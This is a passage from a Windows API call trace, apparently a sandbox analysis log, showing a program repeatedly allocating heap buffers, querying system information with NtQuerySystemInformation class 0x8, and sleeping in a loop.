dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.254] Sleep (dwMilliseconds=0x110) [0213.306] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.306] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.307] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.315] Sleep (dwMilliseconds=0x110) [0213.350] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.350] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.351] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.351] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.355] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.355] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.355] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.359] Sleep (dwMilliseconds=0x110) [0213.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.441] Sleep (dwMilliseconds=0x110) [0213.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.472] Sleep (dwMilliseconds=0x110) [0213.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.568] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.569] Sleep (dwMilliseconds=0x110) [0213.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.804] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.804] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.805] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.805] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.805] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.805] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.813] Sleep (dwMilliseconds=0x110) [0213.884] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.884] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.885] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.885] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.885] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.886] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.886] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.886] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.887] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.891] Sleep (dwMilliseconds=0x110) [0213.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.925] Sleep (dwMilliseconds=0x110) [0213.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0213.975] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0213.976] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.980] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.980] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0213.980] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0213.981] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0213.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0213.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0213.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0213.985] Sleep (dwMilliseconds=0x110) [0214.012] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.041] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.042] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.042] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.042] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.042] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.042] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.042] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.043] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.043] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.048] Sleep (dwMilliseconds=0x110) [0214.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.130] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.131] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.132] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.132] Sleep (dwMilliseconds=0x110) [0214.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.148] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.149] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.149] Sleep (dwMilliseconds=0x110) [0214.195] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.195] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.195] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.200] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.204] Sleep (dwMilliseconds=0x110) [0214.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 